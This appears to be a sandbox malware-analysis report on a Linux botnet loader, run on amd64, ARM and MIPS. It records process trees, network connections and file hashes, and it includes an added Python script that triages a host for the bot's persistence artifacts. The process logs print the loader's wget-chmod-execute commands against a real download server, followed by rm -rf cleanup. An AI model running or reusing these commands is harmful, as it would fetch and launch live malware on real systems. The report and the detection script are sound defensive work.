/tmp/qkdjdjj22.x32
[./qkdjdjj22.x32]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.ppc]
/bin/chmod
[chmod 777 qkdjdjj22.ppc]
/tmp/qkdjdjj22.ppc
[./qkdjdjj22.ppc]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.i586]
/bin/chmod
[chmod 777 qkdjdjj22.i586]
/tmp/qkdjdjj22.i586
[./qkdjdjj22.i586]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.m68k]
/bin/chmod
[chmod 777 qkdjdjj22.m68k]
/tmp/qkdjdjj22.m68k
[./qkdjdjj22.m68k]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.ppc]
/bin/chmod
[chmod 777 qkdjdjj22.ppc]
/tmp/qkdjdjj22.ppc
[./qkdjdjj22.ppc]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.arm4]
/bin/chmod
[chmod 777 qkdjdjj22.arm4]
/tmp/qkdjdjj22.arm4
[./qkdjdjj22.arm4]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.arm5]
/bin/rm
[rm -rf qkdjdjj22.arm4 qkdjdjj22.arm6 qkdjdjj22.i586 qkdjdjj22.m68k qkdjdjj22.mips qkdjdjj22.mpsl qkdjdjj22.ppc qkdjdjj22.ppc.1 qkdjdjj22.sh qkdjdjj22.sh4 qkdjdjj22.x32 qkdjdjj22.x86]
Network
| Country | Destination | Domain | Proto |
| GB | 185.125.188.62:443 | N/A | tcp |
| GB | 185.125.188.61:443 | N/A | tcp |
| US | 151.101.65.91:443 | N/A | tcp |
| US | 151.101.65.91:443 | N/A | tcp |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| N/A | 224.0.0.251:5353 | N/A | udp |
| GB | 195.181.164.19:443 | N/A | tcp |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
Files
/tmp/fileJho6MR
| MD5 | d7c06cd80f877b3697b829ee12851d5d |
| SHA1 | 977a6258d47f140effe07e1b1d6a93ea161ad138 |
| SHA256 | 4fedb406cadc190c90b552b01e5cb1891568db837cccd121fa9965223d21bc22 |
| SHA512 | 19f524abef2e7ffd9908ef34459c6388780e30d69499315a1b70362441ab897af1158bd14c0133d3be8bb27381787c6062f55e8d99be06ee93736cbba535d295 |
/etc/cron.hourly/0
| MD5 | 3f006f7f81fc17be7f4a0d3da0fad5de |
| SHA1 | 97a94d3d0654c6551057af3809b52572bd7f9f5d |
| SHA256 | 982f9e0f089b91ba79df723435099df15c72e1201a45010ee60226ab136c93bf |
| SHA512 | 97d2ac0057427b940ada7c0fc805c1966e2535c3c3767ca85fef4a7e0fdc9d4ef9eb133530408b1e439df067881cb317e948ad9bfd487e958a04c97d9db978e0 |
/tmp/fileJho6MR
| MD5 | 6f344240f3686c40e24f9bb30af5bd93 |
| SHA1 | f3b470c47d9a74c91097836be07f7fc51fd977d6 |
| SHA256 | c1d8a7ed1e88ccc6ac4bd7002b2f9279031c82f45bf8e6f33aaa87602b1d8365 |
| SHA512 | 187ac80956d59e6d5ef0d5b43a4c6c2faf94a4734e834f475421da103b4542571d6928bbbf3a8da0349578985bfefd3175fc908d8a1778f2b6311bb1fe7a1c39 |
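The amd64 run is the one where the bot got past the loader stage: the x86 payload respawns itself as /tmp/file followed by six random characters (each copy re-reads /proc/self/exe and writes the next one), every copy touches /etc/cron.hourly/0 for persistence, and /tmp/qkdjdjj22.x86 overwrites /bin/ls. Those are the artifacts an incident responder would look for on a suspect host. The script below is an added example, not part of the sandbox report: it checks a filesystem root for exactly those indicators. The paths, the /tmp/file naming pattern and the SHA-256 values are taken from the tables above; the check logic, the ROOT parameter, the mtime heuristic for /bin/ls and the build_sample_tree fixture (a constructed directory with placeholder bytes, not real malware) are this example's own. Point it at a mounted image or a copied tree rather than running it on a live, still-compromised host, since the real /bin/ls there cannot be trusted.

```python
"""Triage a Linux filesystem tree for the artifacts seen in the behavioral1 run.

Added example for this report. Indicator paths, the /tmp/file<6 chars> naming
and the SHA-256 values come from the report; the check logic and the fixture
builder are this example's own (the fixture contains placeholder bytes only).
"""
import hashlib
import os
import re
import stat
import tempfile
import time
from pathlib import Path

# SHA-256 values listed under Files for behavioral1.
KNOWN_SHA256 = {
    "982f9e0f089b91ba79df723435099df15c72e1201a45010ee60226ab136c93bf": "/etc/cron.hourly/0 as written by the bot",
    "4fedb406cadc190c90b552b01e5cb1891568db837cccd121fa9965223d21bc22": "/tmp/fileJho6MR (first version)",
    "c1d8a7ed1e88ccc6ac4bd7002b2f9279031c82f45bf8e6f33aaa87602b1d8365": "/tmp/fileJho6MR (second version)",
}
# /tmp/fileJho6MR, /tmp/filevTFhk3, ...: "file" plus six alphanumerics.
DROPPED_NAME = re.compile(r"^file[A-Za-z0-9]{6}$")


def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def triage(root="/"):
    """Return (check, path, detail) findings for the tree rooted at ROOT."""
    root = Path(root)
    findings = []

    cron = root / "etc" / "cron.hourly" / "0"
    if cron.is_file():
        digest = sha256_of(cron)
        findings.append(("cron_hourly_0", str(cron),
                         KNOWN_SHA256.get(digest, "unknown content, sha256=" + digest)))

    ls, chmod = root / "bin" / "ls", root / "bin" / "chmod"
    if ls.is_file() and chmod.is_file():
        # Heuristic: coreutils binaries are installed together, so /bin/ls being
        # clearly newer than its sibling /bin/chmod suggests it was rewritten.
        if ls.stat().st_mtime > chmod.stat().st_mtime + 60:
            findings.append(("bin_ls_modified", str(ls), "mtime newer than /bin/chmod"))

    tmp = root / "tmp"
    if tmp.is_dir():
        for p in sorted(tmp.iterdir()):
            if not p.is_file():
                continue
            mode = stat.S_IMODE(p.stat().st_mode)
            digest = sha256_of(p)
            if digest in KNOWN_SHA256:
                findings.append(("known_payload", str(p), KNOWN_SHA256[digest]))
            if DROPPED_NAME.match(p.name):
                findings.append(("dropped_name_pattern", str(p), f"mode {mode:o}"))
            elif mode & 0o002 and mode & 0o111:  # what "chmod 777" leaves behind
                findings.append(("world_writable_exec_in_tmp", str(p), f"mode {mode:o}"))
    return findings


def build_sample_tree():
    """Constructed fixture: the artifact layout with placeholder bytes, in a temp dir."""
    base = Path(tempfile.mkdtemp(prefix="triage-"))
    (base / "etc" / "cron.hourly").mkdir(parents=True)
    (base / "bin").mkdir()
    (base / "tmp").mkdir()
    (base / "etc" / "cron.hourly" / "0").write_bytes(b"#!/bin/sh\n/tmp/fileJho6MR\n")
    (base / "bin" / "chmod").write_bytes(b"\x7fELF placeholder")
    (base / "bin" / "ls").write_bytes(b"\x7fELF placeholder, rewritten")
    a_month_ago = time.time() - 30 * 86400
    os.utime(base / "bin" / "chmod", (a_month_ago, a_month_ago))  # "installed" long ago
    dropped = base / "tmp" / "fileJho6MR"
    dropped.write_bytes(b"placeholder payload")
    dropped.chmod(0o777)
    (base / "tmp" / "notes.txt").write_bytes(b"benign\n")
    (base / "tmp" / ".keep").write_bytes(b"")
    return str(base)


if __name__ == "__main__":
    for check, path, detail in triage(build_sample_tree()):
        print(f"{check:28} {path}  {detail}")
```

Hash matches are the strongest signal but the weakest coverage: the bot rewrites its /tmp copy (two different hashes are recorded for the same /tmp/fileJho6MR path above), so the name pattern, the cron hook and the replaced coreutils binary are the checks that survive a rebuild.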
Analysis: behavioral2
Detonation Overview
Submitted
2024-07-02 05:54
Reported
2024-07-02 05:56
Platform
debian9-armhf-20240418-en
Max time kernel
147s
Max time network
149s
Command Line
Signatures
Reads system routing table
| Description | Indicator | Process | Target |
| File opened for reading | /proc/net/route | /tmp/qkdjdjj22.arm6 | N/A |
| File opened for reading | /proc/net/route | /tmp/qkdjdjj22.ppc | N/A |
| File opened for reading | /proc/net/route | /tmp/qkdjdjj22.ppc | N/A |
| File opened for reading | /proc/net/route | /tmp/qkdjdjj22.arm4 | N/A |
Reads system network configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/net/route | /tmp/qkdjdjj22.arm6 | N/A |
| File opened for reading | /proc/net/route | /tmp/qkdjdjj22.ppc | N/A |
| File opened for reading | /proc/net/route | /tmp/qkdjdjj22.ppc | N/A |
| File opened for reading | /proc/net/route | /tmp/qkdjdjj22.arm4 | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/qkdjdjj22.mpsl | /usr/bin/wget | N/A |
| File opened for modification | /tmp/qkdjdjj22.sh4 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/qkdjdjj22.x86 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/qkdjdjj22.x32 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/qkdjdjj22.ppc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/qkdjdjj22.i586 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/qkdjdjj22.mips | /usr/bin/wget | N/A |
| File opened for modification | /tmp/qkdjdjj22.arm6 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/qkdjdjj22.m68k | /usr/bin/wget | N/A |
| File opened for modification | /tmp/qkdjdjj22.ppc.1 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/qkdjdjj22.arm4 | /usr/bin/wget | N/A |
Processes
/tmp/qkdjdjj22.sh
[/tmp/qkdjdjj22.sh]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.mips]
/bin/chmod
[chmod 777 qkdjdjj22.mips]
/tmp/qkdjdjj22.mips
[./qkdjdjj22.mips]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.mpsl]
/bin/chmod
[chmod 777 qkdjdjj22.mpsl]
/tmp/qkdjdjj22.mpsl
[./qkdjdjj22.mpsl]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.sh4]
/bin/chmod
[chmod 777 qkdjdjj22.sh4]
/tmp/qkdjdjj22.sh4
[./qkdjdjj22.sh4]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.x86]
/bin/chmod
[chmod 777 qkdjdjj22.x86]
/tmp/qkdjdjj22.x86
[./qkdjdjj22.x86]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.arm6]
/bin/chmod
[chmod 777 qkdjdjj22.arm6]
/tmp/qkdjdjj22.arm6
[./qkdjdjj22.arm6]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.x32]
/bin/chmod
[chmod 777 qkdjdjj22.x32]
/tmp/qkdjdjj22.x32
[./qkdjdjj22.x32]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.ppc]
/bin/chmod
[chmod 777 qkdjdjj22.ppc]
/tmp/qkdjdjj22.ppc
[./qkdjdjj22.ppc]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.i586]
/bin/chmod
[chmod 777 qkdjdjj22.i586]
/tmp/qkdjdjj22.i586
[./qkdjdjj22.i586]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.m68k]
/bin/chmod
[chmod 777 qkdjdjj22.m68k]
/tmp/qkdjdjj22.m68k
[./qkdjdjj22.m68k]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.ppc]
/bin/chmod
[chmod 777 qkdjdjj22.ppc]
/tmp/qkdjdjj22.ppc
[./qkdjdjj22.ppc]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.arm4]
/bin/chmod
[chmod 777 qkdjdjj22.arm4]
/tmp/qkdjdjj22.arm4
[./qkdjdjj22.arm4]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.arm5]
/bin/rm
[rm -rf qkdjdjj22.arm4 qkdjdjj22.arm6 qkdjdjj22.i586 qkdjdjj22.m68k qkdjdjj22.mips qkdjdjj22.mpsl qkdjdjj22.ppc qkdjdjj22.ppc.1 qkdjdjj22.sh qkdjdjj22.sh4 qkdjdjj22.x32 qkdjdjj22.x86]
Network
| Country | Destination | Domain | Proto |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
Files
memory/686-1-0xb6718000-0xb6729044-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-07-02 05:54
Reported
2024-07-02 05:56
Platform
debian9-mipsbe-20240611-en
Max time kernel
147s
Max time network
153s
Command Line
Signatures
Reads system routing table
| Description | Indicator | Process | Target |
| File opened for reading | /proc/net/route | /tmp/qkdjdjj22.mips | N/A |
Reads system network configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/net/route | /tmp/qkdjdjj22.mips | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/qkdjdjj22.sh4 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/qkdjdjj22.x32 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/qkdjdjj22.ppc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/qkdjdjj22.i586 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/qkdjdjj22.m68k | /usr/bin/wget | N/A |
| File opened for modification | /tmp/qkdjdjj22.ppc.1 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/qkdjdjj22.arm4 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/qkdjdjj22.mpsl | /usr/bin/wget | N/A |
| File opened for modification | /tmp/qkdjdjj22.x86 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/qkdjdjj22.arm6 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/qkdjdjj22.mips | /usr/bin/wget | N/A |
Processes
/tmp/qkdjdjj22.sh
[/tmp/qkdjdjj22.sh]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.mips]
/bin/chmod
[chmod 777 qkdjdjj22.mips]
/tmp/qkdjdjj22.mips
[./qkdjdjj22.mips]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.mpsl]
/bin/chmod
[chmod 777 qkdjdjj22.mpsl]
/tmp/qkdjdjj22.mpsl
[./qkdjdjj22.mpsl]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.sh4]
/bin/chmod
[chmod 777 qkdjdjj22.sh4]
/tmp/qkdjdjj22.sh4
[./qkdjdjj22.sh4]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.x86]
/bin/chmod
[chmod 777 qkdjdjj22.x86]
/tmp/qkdjdjj22.x86
[./qkdjdjj22.x86]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.arm6]
/bin/chmod
[chmod 777 qkdjdjj22.arm6]
/tmp/qkdjdjj22.arm6
[./qkdjdjj22.arm6]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.x32]
/bin/chmod
[chmod 777 qkdjdjj22.x32]
/tmp/qkdjdjj22.x32
[./qkdjdjj22.x32]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.ppc]
/bin/chmod
[chmod 777 qkdjdjj22.ppc]
/tmp/qkdjdjj22.ppc
[./qkdjdjj22.ppc]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.i586]
/bin/chmod
[chmod 777 qkdjdjj22.i586]
/tmp/qkdjdjj22.i586
[./qkdjdjj22.i586]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.m68k]
/bin/chmod
[chmod 777 qkdjdjj22.m68k]
/tmp/qkdjdjj22.m68k
[./qkdjdjj22.m68k]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.ppc]
/bin/chmod
[chmod 777 qkdjdjj22.ppc]
/tmp/qkdjdjj22.ppc
[./qkdjdjj22.ppc]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.arm4]
/bin/chmod
[chmod 777 qkdjdjj22.arm4]
/tmp/qkdjdjj22.arm4
[./qkdjdjj22.arm4]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.arm5]
/bin/rm
[rm -rf qkdjdjj22.arm4 qkdjdjj22.arm6 qkdjdjj22.i586 qkdjdjj22.m68k qkdjdjj22.mips qkdjdjj22.mpsl qkdjdjj22.ppc qkdjdjj22.ppc.1 qkdjdjj22.sh qkdjdjj22.sh4 qkdjdjj22.x32 qkdjdjj22.x86]
Network
| Country | Destination | Domain | Proto |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:777 | | tcp |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:777 | | tcp |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:777 | | tcp |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:777 | | tcp |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:777 | | tcp |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:777 | | tcp |
| TR | 195.85.205.47:777 | | tcp |
| TR | 195.85.205.47:777 | | tcp |
| TR | 195.85.205.47:777 | | tcp |
| TR | 195.85.205.47:777 | | tcp |
| TR | 195.85.205.47:777 | | tcp |
| TR | 195.85.205.47:777 | | tcp |
| TR | 195.85.205.47:777 | | tcp |
| TR | 195.85.205.47:777 | | tcp |
| TR | 195.85.205.47:777 | | tcp |
| TR | 195.85.205.47:777 | | tcp |
| TR | 195.85.205.47:777 | | tcp |
| TR | 195.85.205.47:777 | | tcp |
| TR | 195.85.205.47:777 | | tcp |
| TR | 195.85.205.47:777 | | tcp |
| TR | 195.85.205.47:777 | | tcp |
| TR | 195.85.205.47:777 | | tcp |
| TR | 195.85.205.47:777 | | tcp |
| TR | 195.85.205.47:777 | | tcp |
| TR | 195.85.205.47:777 | | tcp |
| TR | 195.85.205.47:777 | | tcp |
| TR | 195.85.205.47:777 | | tcp |
| TR | 195.85.205.47:777 | | tcp |
| TR | 195.85.205.47:777 | | tcp |